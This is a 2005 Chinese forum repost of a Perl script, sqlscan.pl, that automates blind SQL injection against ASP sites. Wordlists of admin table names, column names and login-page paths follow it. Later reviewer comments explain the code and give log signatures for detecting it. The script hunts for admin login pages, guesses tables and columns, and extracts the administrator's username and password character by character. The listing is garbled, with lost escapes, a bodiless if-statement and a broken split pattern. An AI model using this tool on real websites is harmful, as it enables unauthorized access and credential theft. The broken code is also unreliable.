ascc+asp自动注射代码,可以猜后台
时间:2005-03-16 来源:huzi211
sqlscan.pl
Submitted by superhei on 2004, July 8, 2:17 AM. 我的DD
#!/usr/bin/perl
#Codz By 黑嘿黑<[email protected]>2004/1/21.
#Thx MIX
# NOTE(review): this listing appears to have lost its backslash escapes in
# extraction (the "\n" that would terminate every print string is absent,
# and the `if` on the ARGV check below has no block), so the text does not
# parse as shown.  The comments below describe what the code evidently does,
# from the point of view of someone who has to recognize this traffic in logs.
$|=1;                                   # unbuffered STDOUT so progress dots appear immediately
use IO::Socket;
# Banner / usage.  No `use strict` / `use warnings`: apart from a few `my`
# locals, every variable here is a package global, and the subs below
# communicate through those globals rather than through arguments.
print "======================================================================= ";
print " The sqlform-find Script Codz By 黑嘿黑<QQ:123230273> ";
print " Our Team : www.cnse8.com ";
print " My Home : xyhack.91i.net ";
print "======================================================================= ";
print "Usage: sql.exe 127.0.0.1 80 /test/wenxue/readarticle.asp?id=3 测试成功 ";
print "----------------------------------------------------------------------- ";
# Arguments: target host, port, the URL path whose query parameter is probed
# ($way), and a "judge" string ($judge) that appears in the page when the
# injected condition is true — i.e. boolean-based blind probing.
# The first `if` has no body; presumably the usage() sub at the bottom of the
# file was meant to be called here.  As written it is a syntax error.
if ($#ARGV<1)
if ($#ARGV>1){
$host=$ARGV[0];
$port=$ARGV[1];
$way=$ARGV[2];
$judge=$ARGV[3];}
# Wordlists (their contents follow the script): candidate table names,
# candidate column names, candidate login-page paths.  Bareword handles and
# 2-arg open — the names are constants, so not injectable here — and the
# first die message says "splfrom.txt" while the file opened is sqlfrom.txt.
open(DB, 'sqlfrom.txt') || die "Can't open splfrom.txt.";
@Form = <DB>;
close (DB);
open(L, 'lines.txt') || die "Can't open lines.txt.";
@lines = <L>;
close (L);
open(LG, 'login.txt') || die "Can't open login.txt.";
@login = <LG>;
close (LG);
# Phase 1: login-page enumeration.  For each login.txt entry, str1() requests
# <directory of $way>/<entry> and only the status code of the first response
# line is examined, so any catch-all page that answers 200 is reported as a
# hit.  Detection note: a run of sequential HTTP/1.0 GETs for well-known
# admin paths from one source, Referer equal to the bare host, empty Cookie.
foreach $log (@login){
chomp $log;
@res=str1();
foreach $check (@res){
($http,$code,$blah) = split(/ /,$check);            # "HTTP/1.x 200 OK" -> $code
if($code == 200){
print "Kaka !! Find the login: http://$host$way1$log ";  # $way1 is a global set inside str1()
}
}
}
# Phase 2: table/column discovery.  str() appends
# "and exists(select <line> from <sqlfrom>)" to the URL for each table-name
# candidate; a response containing $judge means the table exists, and every
# lines.txt entry is then tried as a column name the same way.  $judge is
# used unescaped as a regex, so metacharacters in it are not literal.
# "Uaa$sqlfromE" / "a$line1" look like the remains of \U..\E and \a escapes —
# can't tell from here.
foreach $sqlfrom (@Form){
chomp $sqlfrom;
$line="*";                              # table check first ("select * from …")
@res=str();
@num=grep /$judge/, @res;
$size=@num;
if ($size > 0){
print " KaKa !! Find the sqlfrom is Uaa$sqlfromE: ";
foreach $line1 (@lines){
chomp $line1;
$line=$line1;                           # then each column-name candidate
@res=str();
@num=grep /$judge/, @res;
$size=@num;
if ($size > 0){
print "a$line1 ";
}
}
}
}
# Phase 3: interactive.  The operator types the admin table name and its
# id/username/password column names.  Bug: "$SQLForm=" inside double quotes
# interpolates the still-undefined variable, so each prompt prints only "=".
print "aa Input the SQLForm of admin ! $SQLForm=";$SQLForm=<STDIN>;chomp $SQLForm;
print "$id=";$ids=<STDIN>;chomp $ids;
print "$Username=";$usernames=<STDIN>;chomp $usernames;
print "$Password=";$passwords=<STDIN>;chomp $passwords;
print " Now , Start to Crack ! Please wait...... ";
#under here is SQL Words
# Each step below stores an "and exists(select … where <cond>)" suffix in the
# globals $path1/$path2(/$path3) that crackint()/crackchar() read:
#   id:      where <id>=N          (N tried in 1..100)
#   length:  where len(<col>)=N
#   content: where left(<col>,j)='<prefix><candidate>'
# len()/left() imply a SQL dialect with those functions (the post title
# mentions Access/ASP) — TODO confirm.  Every probe is a separate page GET
# preceded by sleep(1) in the subs, so a run is a steady ~1 req/s stream of
# query strings containing "%20and%20exists(select%20" — an easy log/WAF
# signature, and a long one: minutes per recovered string.
$path1 ="%20and%20exists(select%20$ids%20from%20$SQLForm%20where%20$ids=";
$path2 =")";
$id = crackint();
print " Successful,The id of the first admin's id is a$id . ";
$path1 ="%20and%20exists(select%20$ids%20from%20$SQLForm%20where%20len($passwords)=";
$path2 = "%20and%20$ids=$id)";
$len = crackint();                      # $len is also read as a global by crackchar()
print " Successful,The len of admin's password is a$len . ";
$path1 = "%20and%20exists(select%20$ids%20from%20$SQLForm%20where%20left($passwords,";
$path2 = ")='";
$path3 = "'%20and%20$ids=$id)";
@password = crackchar();
print " Successful,The admin's password is aa@password . ";
$path1 ="%20and%20exists(select%20$ids%20from%20$SQLForm%20where%20len($usernames)=";
$path2 = "%20and%20$ids=$id)";
$len = crackint();
print " Successful,The len of admin's name is $len . ";
$path1 = "%20and%20exists(select%20$ids%20from%20$SQLForm%20where%20left($usernames,";
$path2 = ")='";
$path3 = "'%20and%20$ids=$id)";
@username = crackchar();
print " Successful,The admin's username is aa@username . ";
print "KaKa !! aayou can use username: @username password: @password to login test ! ";
# Returns the first integer N in 1..100 for which the page fetched from
# "$way" . $path1 . N . $path2 still contains $judge.  Reads the globals
# $path1, $path2, $way, $host, $judge; when nothing in the range matches the
# sub falls off the end and returns an empty list / undef, which the callers
# then interpolate as an empty value.
# Style: `my $path` is declared twice in one scope (a warning, if warnings
# were enabled); the `last` after `return` is unreachable; @dic, $i, $req,
# @in, @num and $size are all globals.
sub crackint {
@dic=(1..100);
for ($i=0;$i<@dic;$i++)
{
my $path=$path1.$dic[$i];
my $path=$path.$path2;
$req = "GET $way$path HTTP/1.0 ".       # HTTP/1.0, a new connection per probe (see sock())
"Referer: http://$host$way ".
"Host: $host ";
print "$dic[$i].";                      # progress dot
sleep(1);                               # one-second pause between probes
@in = sock($req);
@num=grep /$judge/, @in;                # $judge is a regex here, not a literal
$size=@num;
if ($size > 0) {
return $dic[$i];
last;
}
}
}
# Recovers a string of length $len (global, left behind by the preceding
# crackint() call) one position at a time: for position j every candidate c
# in @dic is tried and the first one whose probe page contains $judge is
# appended to the prefix, the probe URL being
# "$way" . $path1 . j . $path2 . <prefix>c . $path3.
# Returns the recovered string after undoing the three percent-encodings used
# in @special.  Observations: when no candidate matches at a position the
# loop simply moves on, so the result can be shorter than $len; @special2
# (full-width / CJK punctuation) is placed in the request line unencoded;
# `$j.th` is a bareword concatenation that only parses because strict is off.
sub crackchar {
my $pws;                                # prefix recovered so far
my @dic11=(0..9);
my @dic12=(a..z);
my @dic13=(A..Z);
# %25, %26 and %2b stand in for "%", "&" and "+" so they survive in a query string
my @special=qw(` ~ ! @ # $ %25 ^ %26 * ( ) _ %2b = - { } [ ] : " ; < > ? | , . / );
my @special2=qw( ` ~ ! · # ¥ % …… — * ( ) —— + - = { } [ ] : ” “ ; ’ 《 》 ? │ , 。 / 、 〈 〉 ');
my @dic=(@dic11,@dic12,@dic13,@special,@special2);
for ($j=1;$j<=$len;$j++)                # $j and $i are globals
{
for ($i=0;$i<@dic;$i++)
{
my $key=$pws.$dic[$i];
my $path=$path1.$j;                     # `my $path` redeclared four times in this scope
my $path=$path.$path2;
my $path=$path.$key;
my $path=$path.$path3;
$req = "GET $way$path HTTP/1.0 ".
"Referer: http://$host$way ".
"Host:$host ";                          # no space after "Host:" here, unlike crackint()
print "$dic[$i].";
sleep(1);                               # one-second pause per probe; a full run takes minutes
@in =sock($req);
@num=grep /$judge/, @in;
$size=@num;
if ($size > 0) {
$th=$j.th;                              # e.g. "1th"
print " Successful,The $th word of the char is $dic[$i] ";
$pws=$pws.$dic[$i];
last;                                   # first hit wins for this position
}
}
}
# map the percent-encoded candidates back to the literal characters
$pws=~s/\%2b/+/ig;
$pws=~s/\%25/\%/ig;
$pws=~s/\%26/&/ig;
return $pws;
}
# Phase-2 existence probe.  Builds
# "$way%20and%20exists(select%20$line%20from%20$sqlfrom)" from globals
# ($line is "*" for the table check and a column name afterwards), sends it
# with Referer set to the bare host and an empty Cookie header, and returns
# the response lines: sock()'s list is the last expression, so it is the
# implicit return value.  Unlike the crack subs there is no sleep() here.
sub str{
$path="%20and%20exists(select%20".$line."%20from%20$sqlfrom)";
$req = "GET $way$path HTTP/1.0 ".
"Host: $host ".
"Referer: $host ".
"Cookie: ";
sock($req);
}
# Phase-1 login-page probe.  Intends to split $way on "/" (the pattern on the
# next line is mangled — `///` does not parse) and drop the last segment so
# that $way1 is the directory of the probed script; the login.txt entry in
# $log is then requested relative to it.  $i is an uninitialized global at
# this point (crackint() sets it later), so @s[$i-1] is @s[-1], the last
# segment.  $s is assigned but never used.  Sets the global $way1 (read by
# the caller's print) and returns the response lines from sock().
sub str1{
@s=split(///,$way);
$s=@s;
$ss=@s[$i-1];                           # one-element slice, effectively $s[-1]
$d=length($ss);
$e=length($way);
$way1=substr($way,0,$e-$d);             # $way minus its last segment
$req = "GET $way1$log HTTP/1.0 ".
"Host: $host ".
"Referer: $host ".
"Cookie: ";
sock($req);
}
# Sends one raw HTTP request and returns every line of the response.  Opens a
# fresh TCP connection to the globals $host:$port on every call (HTTP/1.0, no
# keep-alive) with no timeout, so a host that accepts the connection but
# never answers hangs the run, and a refused connection die()s and aborts the
# whole script.  $req is expected to already carry the blank line that ends
# the headers; it is not visible in the extracted strings.
sub sock{
my ($req) = @_;
my $connection = IO::Socket::INET->new(Proto =>"tcp",
PeerAddr =>$host,
PeerPort =>$port) || die "Sorry! Could not connect to $host ";
print $connection $req;
my @res = <$connection>;                # read until the server closes
close $connection;
return @res;
}
# Interactive fallback that reads host, port, path and judge string from STDIN
# into the same globals the ARGV branch fills.  It is not called anywhere in
# the visible code (the bodiless `if ($#ARGV<1)` near the top is the likely
# intended call site).  As with the phase-3 prompts, "$Host=" etc. interpolate
# undefined variables, so each prompt ends in a bare "=".
sub usage {
print " Input the Host Info ! $Host=";$host=<STDIN>;chomp $host;
print "$Port=";$port=<STDIN>;chomp $port;
print "$Way=";$way=<STDIN>;chomp $way;
print "Input the Judge Words ! $Judge=";$judge=<STDIN>;chomp $judge;
}
=================== end =============================
sqlfrom.txt:
admin
user
users
userinfo
admin_userinfo
password
adminuser
manboard
diaryuseruser
pwd
t_user
用户
管理员
lines.txt:
id
userid
username
usr
admin
name
user
userpwd
password
pwd
passwd
psword
pass
pws
pwa
user_id
user_name
user_pass
admin_id
admin_name
admin_pass
admin_password
u_id
u_name
u_password
auid
apwd
姓名
密码
login.txt:
pass.asp
password.asp
psd.asp
username/login.asp
username/admin.asp
denglu.asp
login/admin.asp
login/login.asp
admin_login.asp
login_admin.asp
userlogin.asp
User.Asp
user/login.asp
admin/admin.asp
admin/login.asp
admin.asp
login.htm
admin_login/admin.asp
login_admin/login_admin.asp
login.asp
admpast.asp
admin_login.asp
adminlogin.asp
manageNews/index.htm
Admin/admin_login.asp
admin_index.asp
adminn/index.asp
admin/adminlogin.asp
admin/default.asp
manage/login.asp